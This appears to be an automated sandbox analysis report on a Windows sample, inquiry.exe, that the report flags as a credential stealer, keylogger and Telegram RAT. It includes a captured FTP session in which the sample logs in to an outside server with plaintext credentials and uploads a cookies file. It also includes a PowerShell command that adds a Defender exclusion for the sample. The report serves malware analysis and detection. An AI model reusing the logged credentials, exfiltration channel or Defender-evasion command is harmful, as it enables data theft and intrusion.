                                                        Sep 25, 2024 18:50:51.631582975 CEST2149734192.64.117.204192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                        Sep 25, 2024 18:50:51.631845951 CEST4973421192.168.2.7192.64.117.204USER august@fastestpay.digital
                                                        Sep 25, 2024 18:50:51.800518990 CEST2149734192.64.117.204192.168.2.7331 User august@fastestpay.digital OK. Password required
                                                        Sep 25, 2024 18:50:51.800785065 CEST4973421192.168.2.7192.64.117.204PASS 1Qj;XlmD!Lrj
                                                        Sep 25, 2024 18:50:52.144313097 CEST2149734192.64.117.204192.168.2.7230 OK. Current restricted directory is /
                                                        Sep 25, 2024 18:50:52.426245928 CEST2149734192.64.117.204192.168.2.7504 Unknown command
                                                        Sep 25, 2024 18:50:52.426471949 CEST4973421192.168.2.7192.64.117.204PWD
                                                        Sep 25, 2024 18:50:52.632359028 CEST2149734192.64.117.204192.168.2.7257 "/" is your current location
                                                        Sep 25, 2024 18:50:52.632617950 CEST4973421192.168.2.7192.64.117.204TYPE I
                                                        Sep 25, 2024 18:50:52.809649944 CEST2149734192.64.117.204192.168.2.7200 TYPE is now 8-bit binary
                                                        Sep 25, 2024 18:50:52.809813976 CEST4973421192.168.2.7192.64.117.204PASV
                                                        Sep 25, 2024 18:50:52.985399008 CEST2149734192.64.117.204192.168.2.7227 Entering Passive Mode (192,64,117,204,47,12)
                                                        Sep 25, 2024 18:50:52.991204977 CEST4973421192.168.2.7192.64.117.204STOR 494126 - Cookies ID - ZyiAEnXWZP1275365848.txt
                                                        Sep 25, 2024 18:50:53.527370930 CEST2149734192.64.117.204192.168.2.7150 Accepted data connection
                                                        Sep 25, 2024 18:50:53.700197935 CEST2149734192.64.117.204192.168.2.7226-File successfully transferred
                                                        226-File successfully transferred226 0.174 seconds (measured here), 5.80 Kbytes per second

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:2
                                                        Start time:12:50:15
                                                        Start date:25/09/2024
                                                        Path:C:\Users\user\Desktop\inquiry.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\inquiry.exe"
                                                        Imagebase:0x1f8698b0000
                                                        File size:1'399'327 bytes
                                                        MD5 hash:E645B187588A20E886416884000446DB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:12:50:19
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force
                                                        Imagebase:0x7ff741d30000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:12:50:19
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:12:50:19
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                        Imagebase:0x6c0000
                                                        File size:262'432 bytes
                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:11
                                                        Start time:12:50:19
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        Wow64 process (32bit):
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                        Imagebase:
                                                        File size:262'432 bytes
                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:12:50:20
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\System32\WerFault.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7340 -s 1312
                                                        Imagebase:0x7ff7c03a0000
                                                        File size:570'736 bytes
                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:12:50:29
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff7fb730000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:10.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 14513 7ffaacc031b9 14514 7ffaacc031c5 VirtualProtect 14513->14514 14516 7ffaacc03271 14514->14516

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 7ffaacc091b0-7ffaacc0d385 2 7ffaacc0d3cf-7ffaacc0d3f9 0->2 3 7ffaacc0d387-7ffaacc0d3ce 0->3 5 7ffaacc0d3fb-7ffaacc0d410 2->5 6 7ffaacc0d412 2->6 3->2 8 7ffaacc0d414-7ffaacc0d419 5->8 6->8 10 7ffaacc0d41f-7ffaacc0d42e 8->10 11 7ffaacc0d516-7ffaacc0d536 8->11 15 7ffaacc0d430-7ffaacc0d436 10->15 16 7ffaacc0d438-7ffaacc0d439 10->16 13 7ffaacc0d587-7ffaacc0d592 11->13 17 7ffaacc0d594-7ffaacc0d5a3 13->17 18 7ffaacc0d538-7ffaacc0d53e 13->18 21 7ffaacc0d43b-7ffaacc0d45e 15->21 16->21 24 7ffaacc0d5a5-7ffaacc0d5b7 17->24 25 7ffaacc0d5b9 17->25 19 7ffaacc0da02-7ffaacc0da1a 18->19 20 7ffaacc0d544-7ffaacc0d565 call 7ffaacc09190 18->20 32 7ffaacc0da1c-7ffaacc0da57 call 7ffaacc087f0 19->32 33 7ffaacc0da64-7ffaacc0da79 call 7ffaacc04498 19->33 37 7ffaacc0d56a-7ffaacc0d584 20->37 28 7ffaacc0d4b3-7ffaacc0d4be 21->28 29 7ffaacc0d5bb-7ffaacc0d5c0 24->29 25->29 30 7ffaacc0d460-7ffaacc0d466 28->30 31 7ffaacc0d4c0-7ffaacc0d4d7 28->31 35 7ffaacc0d64c-7ffaacc0d660 29->35 36 7ffaacc0d5c6-7ffaacc0d5e8 call 7ffaacc09190 29->36 30->19 38 7ffaacc0d46c-7ffaacc0d4b0 call 7ffaacc09190 30->38 49 7ffaacc0d506-7ffaacc0d511 call 7ffaacc08838 31->49 50 7ffaacc0d4d9-7ffaacc0d4ff call 7ffaacc09190 31->50 83 7ffaacc0daa1-7ffaacc0daab 32->83 84 7ffaacc0da59-7ffaacc0da62 32->84 55 7ffaacc0da7e-7ffaacc0da91 33->55 40 7ffaacc0d6b0-7ffaacc0d6bf 35->40 41 7ffaacc0d662-7ffaacc0d668 35->41 70 7ffaacc0d5ea-7ffaacc0d614 36->70 71 7ffaacc0d616-7ffaacc0d617 36->71 37->13 38->28 65 7ffaacc0d6cc 40->65 66 7ffaacc0d6c1-7ffaacc0d6ca 40->66 46 7ffaacc0d66a-7ffaacc0d685 41->46 47 7ffaacc0d687-7ffaacc0d69f 41->47 46->47 63 7ffaacc0d6a8-7ffaacc0d6ab 47->63 49->35 50->49 78 7ffaacc0da9c-7ffaacc0da9f 55->78 79 7ffaacc0da93-7ffaacc0da9b 55->79 72 7ffaacc0d858-7ffaacc0d86d 63->72 67 7ffaacc0d6ce-7ffaacc0d6d3 65->67 66->67 75 7ffaacc0d9df-7ffaacc0d9e0 67->75 76 7ffaacc0d6d9-7ffaacc0d6dc 67->76 82 7ffaacc0d619-7ffaacc0d620 70->82 71->82 90 7ffaacc0d8ad 72->90 91 7ffaacc0d86f-7ffaacc0d8ab 72->91 92 7ffaacc0d9e3 75->92 85 7ffaacc0d6de-7ffaacc0d6f0 call 7ffaacc00238 76->85 86 7ffaacc0d724 76->86 78->83 79->78 82->35 93 7ffaacc0d622-7ffaacc0d647 call 7ffaacc091b8 82->93 87 7ffaacc0daad-7ffaacc0dab5 83->87 88 7ffaacc0dab6-7ffaacc0dac7 83->88 84->33 114 7ffaacc0d6f6-7ffaacc0d6fb 85->114 100 7ffaacc0d726-7ffaacc0d72b 86->100 87->88 97 7ffaacc0dad2-7ffaacc0dada 88->97 98 7ffaacc0dac9-7ffaacc0dad1 88->98 94 7ffaacc0d8af-7ffaacc0d8b4 90->94 91->94 101 7ffaacc0d9ee-7ffaacc0d9f2 92->101 102 7ffaacc0d9e5-7ffaacc0d9ed 92->102 113 7ffaacc0d9ce-7ffaacc0d9de 93->113 104 7ffaacc0d924-7ffaacc0d938 94->104 105 7ffaacc0d8b6-7ffaacc0d90d call 7ffaacc043d0 94->105 98->97 109 7ffaacc0d82c-7ffaacc0d84f 100->109 110 7ffaacc0d731-7ffaacc0d73d 100->110 103 7ffaacc0d9f3-7ffaacc0d9fb 101->103 102->101 103->19 115 7ffaacc0d93a-7ffaacc0d965 call 7ffaacc043d0 104->115 116 7ffaacc0d987-7ffaacc0d993 call 7ffaacc074f0 104->116 150 7ffaacc0d97e-7ffaacc0d983 105->150 151 7ffaacc0d90f-7ffaacc0d913 105->151 123 7ffaacc0d855-7ffaacc0d856 109->123 110->19 118 7ffaacc0d743-7ffaacc0d752 110->118 114->86 132 7ffaacc0d6fd-7ffaacc0d71b 114->132 135 7ffaacc0d96a-7ffaacc0d972 115->135 128 7ffaacc0d994-7ffaacc0d9ac 116->128 119 7ffaacc0d754-7ffaacc0d763 118->119 120 7ffaacc0d765-7ffaacc0d772 call 7ffaacc00238 118->120 136 7ffaacc0d778-7ffaacc0d77e 119->136 120->136 123->72 128->19 133 7ffaacc0d9ae-7ffaacc0d9be 128->133 132->114 147 7ffaacc0d71d-7ffaacc0d722 132->147 138 7ffaacc0d9c0-7ffaacc0d9cb 133->138 135->92 139 7ffaacc0d974-7ffaacc0d977 135->139 140 7ffaacc0d780-7ffaacc0d7ad 136->140 141 7ffaacc0d7b3-7ffaacc0d7b8 136->141 138->113 139->103 144 7ffaacc0d979 139->144 140->141 141->19 148 7ffaacc0d7be-7ffaacc0d7de 141->148 144->138 149 7ffaacc0d97b 144->149 147->100 155 7ffaacc0d7e0-7ffaacc0d7ee 148->155 156 7ffaacc0d7f2-7ffaacc0d822 call 7ffaacc08fd8 148->156 149->150 150->116 151->128 154 7ffaacc0d915-7ffaacc0d91f 151->154 154->104 155->156 160 7ffaacc0d827-7ffaacc0d82a 156->160 160->72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0#$0#$0#$:S_E$x!
                                                          • API String ID: 0-2710069457
                                                          • Opcode ID: d41f54e7ab7ec70bf1fc5bea67796d849ccc8701d3ebc27d42967f143c66e9da
                                                          • Instruction ID: 68e7438b0b21785fcf7ace82a8e7eaa8c2f8f801d4e9774812e64d5395b41bd8
                                                          • Opcode Fuzzy Hash: d41f54e7ab7ec70bf1fc5bea67796d849ccc8701d3ebc27d42967f143c66e9da
                                                          • Instruction Fuzzy Hash: 7742B630A09A099FEBA8DF2CD455B7977E1EF5A301F1441BEE44EC7292DE24EC468781
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514353488.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaaccd0000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 949399da79addafa20f79f977a794672db3f20f17648a4cb2e02db85076c2ad6
                                                          • Instruction ID: 097d9c4534494fdd61ef17f25ce690da40880a89306cd4b1ab95a60ec7576833
                                                          • Opcode Fuzzy Hash: 949399da79addafa20f79f977a794672db3f20f17648a4cb2e02db85076c2ad6
                                                          • Instruction Fuzzy Hash: 09E2067290E7868FF756DB2888556A47FE0EF56310F0941FFD08DCB192DA28A85AC7C1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1330 7ffaacc033d0-7ffaacc04ae1 call 7ffaacc049a0 1337 7ffaacc04b04-7ffaacc04b13 1330->1337 1338 7ffaacc04b15-7ffaacc04b2f call 7ffaacc049a0 call 7ffaacc049f0 1337->1338 1339 7ffaacc04ae3-7ffaacc04af9 call 7ffaacc049a0 call 7ffaacc049f0 1337->1339 1348 7ffaacc04b30-7ffaacc04b80 1339->1348 1349 7ffaacc04afb-7ffaacc04b02 1339->1349 1353 7ffaacc04b82-7ffaacc04b87 call 7ffaacc035c0 1348->1353 1354 7ffaacc04b8c-7ffaacc04bc3 1348->1354 1349->1337 1353->1354 1357 7ffaacc04bc9-7ffaacc04bd4 1354->1357 1358 7ffaacc04dbf-7ffaacc04e29 1354->1358 1359 7ffaacc04c48-7ffaacc04c4d 1357->1359 1360 7ffaacc04bd6-7ffaacc04be4 1357->1360 1387 7ffaacc04e46-7ffaacc04e53 1358->1387 1388 7ffaacc04e2b-7ffaacc04e31 1358->1388 1362 7ffaacc04cc0-7ffaacc04cca 1359->1362 1363 7ffaacc04c4f-7ffaacc04c5b 1359->1363 1360->1358 1364 7ffaacc04bea-7ffaacc04bf9 1360->1364 1366 7ffaacc04cec-7ffaacc04cf4 1362->1366 1367 7ffaacc04ccc-7ffaacc04cd9 call 7ffaacc035e0 1362->1367 1363->1358 1365 7ffaacc04c61-7ffaacc04c74 1363->1365 1368 7ffaacc04c2d-7ffaacc04c38 1364->1368 1369 7ffaacc04bfb-7ffaacc04c2b 1364->1369 1372 7ffaacc04cf7-7ffaacc04d02 1365->1372 1366->1372 1385 7ffaacc04cde-7ffaacc04cea 1367->1385 1368->1358 1370 7ffaacc04c3e-7ffaacc04c46 1368->1370 1369->1368 1377 7ffaacc04c79-7ffaacc04c7c 1369->1377 1370->1359 1370->1360 1372->1358 1375 7ffaacc04d08-7ffaacc04d18 1372->1375 1375->1358 1378 7ffaacc04d1e-7ffaacc04d2b 1375->1378 1380 7ffaacc04c92-7ffaacc04c9a 1377->1380 1381 7ffaacc04c7e-7ffaacc04c8e 1377->1381 1378->1358 1384 7ffaacc04d31-7ffaacc04d51 1378->1384 1380->1358 1382 7ffaacc04ca0-7ffaacc04cbf 1380->1382 1381->1380 1384->1358 1394 7ffaacc04d53-7ffaacc04d62 1384->1394 1385->1366 1395 7ffaacc04e54-7ffaacc04e70 1387->1395 1390 7ffaacc04e33-7ffaacc04e44 1388->1390 1391 7ffaacc04e71-7ffaacc04e88 1388->1391 1390->1387 1390->1388 1391->1395 1401 7ffaacc04e8a-7ffaacc04ec5 1391->1401 1397 7ffaacc04d64-7ffaacc04d6f 1394->1397 1398 7ffaacc04dad-7ffaacc04dbe 1394->1398 1397->1398 1404 7ffaacc04d71-7ffaacc04da8 call 7ffaacc035e0 1397->1404 1405 7ffaacc04ed9-7ffaacc04f11 1401->1405 1406 7ffaacc04ec7-7ffaacc04ed7 1401->1406 1404->1398 1412 7ffaacc04f68-7ffaacc04f6f 1405->1412 1413 7ffaacc04f13-7ffaacc04f19 1405->1413 1406->1405 1406->1406 1416 7ffaacc04fb2-7ffaacc04fdb 1412->1416 1417 7ffaacc04f71-7ffaacc04f72 1412->1417 1413->1412 1415 7ffaacc04f1b-7ffaacc04f1c 1413->1415 1419 7ffaacc04f1f-7ffaacc04f22 1415->1419 1420 7ffaacc04f75-7ffaacc04f78 1417->1420 1422 7ffaacc04f28-7ffaacc04f35 1419->1422 1423 7ffaacc04fdc-7ffaacc04ff1 1419->1423 1420->1423 1424 7ffaacc04f7a-7ffaacc04f8b 1420->1424 1425 7ffaacc04f37-7ffaacc04f5e 1422->1425 1426 7ffaacc04f61-7ffaacc04f66 1422->1426 1433 7ffaacc04ff3-7ffaacc04ffa 1423->1433 1434 7ffaacc04ffb-7ffaacc05081 1423->1434 1427 7ffaacc04fa9-7ffaacc04fb0 1424->1427 1428 7ffaacc04f8d-7ffaacc04f93 1424->1428 1425->1426 1426->1412 1426->1419 1427->1416 1427->1420 1428->1423 1429 7ffaacc04f95-7ffaacc04fa5 1428->1429 1429->1427 1433->1434
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: d
                                                          • API String ID: 0-2564639436
                                                          • Opcode ID: 81b4afd858a12ca477d68213cb0bf61381d16cf83ad6113273786d3923d4dbde
                                                          • Instruction ID: 2f2d6f42531e6122d62bfd5809bac74d64d49cb1d7e99a88bb4ddd156b11008a
                                                          • Opcode Fuzzy Hash: 81b4afd858a12ca477d68213cb0bf61381d16cf83ad6113273786d3923d4dbde
                                                          • Instruction Fuzzy Hash: 2322557191DA498FE789DF28D4859B277E1EF82310B1482B9D49EC7197EE28E847C7C0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e80a3280c52dbd907c784d0cfad602575c9edf6a8d6726ce0e426f3b740610b
                                                          • Instruction ID: eb81b6d660c9e3406f06133503877129178d32ca53b7aed94411a55eb6cb6a16
                                                          • Opcode Fuzzy Hash: 1e80a3280c52dbd907c784d0cfad602575c9edf6a8d6726ce0e426f3b740610b
                                                          • Instruction Fuzzy Hash: 8692453051DB4A8FE359DF28C4944B5B7E1FF86305B1485BEE48EC72A6DA34E84AC781
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f008b99d0dbdf6a9822416581882c4fbabc1d6aa338cc0201dd5a4b25640532
                                                          • Instruction ID: 10312a507fb136a3810490d734f6cf6d3c333bb35efe74f668f26eebe1796c5d
                                                          • Opcode Fuzzy Hash: 0f008b99d0dbdf6a9822416581882c4fbabc1d6aa338cc0201dd5a4b25640532
                                                          • Instruction Fuzzy Hash: 8382347190EA868FF7598F2584516B47BE1EF96310F1481BDD48E8B5D3DA28EC4ACBC0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 242bb13d5a1556c9b45371cb77e7b6170f3a4d72c8a47a71623be0afd4af25a3
                                                          • Instruction ID: 89bdc17787b72433da6830fa53a053552e4aa29f6845bdf842a2d2eed72b4c21
                                                          • Opcode Fuzzy Hash: 242bb13d5a1556c9b45371cb77e7b6170f3a4d72c8a47a71623be0afd4af25a3
                                                          • Instruction Fuzzy Hash: 8D71F771A1CA499FE79CEF28D4554BAB3E1FF96310B00453EE48FC3592EE24E8468681
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd9081d25d859b3974d26adb9bb52ba8ce3e4a0c01370f1822df27daab1016b5
                                                          • Instruction ID: e258a7fcdb072e1d38449b663fb582d77d030f92de4a2372b212b62707751a9a
                                                          • Opcode Fuzzy Hash: dd9081d25d859b3974d26adb9bb52ba8ce3e4a0c01370f1822df27daab1016b5
                                                          • Instruction Fuzzy Hash: 7D417B7160D64D4FE71D9E38881A1B53B95EB43220B15C27FE48BC76A3DD18D84783D1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1694 7ffaacc031b9-7ffaacc031c3 1695 7ffaacc03205-7ffaacc0326f VirtualProtect 1694->1695 1696 7ffaacc031c5-7ffaacc03202 1694->1696 1699 7ffaacc03277-7ffaacc0329f 1695->1699 1700 7ffaacc03271 1695->1700 1696->1695 1700->1699
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: e19b51230b35b1469a37401dc7b5c8b94358c1778f38299af62dcb7fe251be18
                                                          • Instruction ID: 68d0ec0ce37b6585a45f9541dfe914a47afda0f8a45e611c93dee0c3864fdf6b
                                                          • Opcode Fuzzy Hash: e19b51230b35b1469a37401dc7b5c8b94358c1778f38299af62dcb7fe251be18
                                                          • Instruction Fuzzy Hash: 5631077190CA4C8FDB18DF9CD8456F97BE1EF96311F04422FD049C3592CB646846CB81

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1701 7ffaacc0974b-7ffaacc184ef VirtualProtect 1705 7ffaacc184f1 1701->1705 1706 7ffaacc184f7-7ffaacc1851f 1701->1706 1705->1706
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 94066727a0b53ff4169215f9628cf97dfd847ba517b406a198f1b914ebbc9dd3
                                                          • Instruction ID: 8c4b4489eb9b9967c48df266f4a05f2a64786c61b8c0d24a9e065dac2f3185f8
                                                          • Opcode Fuzzy Hash: 94066727a0b53ff4169215f9628cf97dfd847ba517b406a198f1b914ebbc9dd3
                                                          • Instruction Fuzzy Hash: 8231E77090CA0C8FDB18DF9DD8496F9B7E1EB69311F00422FD04AD3652DF70A8468791
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514353488.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaaccd0000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0187a023facadbef601d867f42e45d16b2fb84625adbc9ccff7d48461bc9fbc
                                                          • Instruction ID: 5a0cddf3d886d829cbd8bf40e1dcb45389f634bfcf85500b5573307be768cd46
                                                          • Opcode Fuzzy Hash: d0187a023facadbef601d867f42e45d16b2fb84625adbc9ccff7d48461bc9fbc
                                                          • Instruction Fuzzy Hash: 8671247190DB8A8FEB57DF68C8566A57BE0EF56310B0541FBD04EC7193EE29A819C380
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1514353488.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ffaaccd0000_inquiry.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab08da649075e7e9a93b44b52337982b0fb5c363b6ea3393a6bfd8662b41d63d
                                                          • Instruction ID: d1871ad0914fd1c7f8f6dbb10a3a19c5fa84f04747a4246f41fd08cd8608bb3e
                                                          • Opcode Fuzzy Hash: ab08da649075e7e9a93b44b52337982b0fb5c363b6ea3393a6bfd8662b41d63d
                                                          • Instruction Fuzzy Hash: 5D31FF31908A4E8FEB5AEF18D8566B87BE0FF65320F14427AD04EC3581EE21E86583C0

                                                          Execution Graph

                                                          Execution Coverage:11.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:11
                                                          Total number of Limit Nodes:2
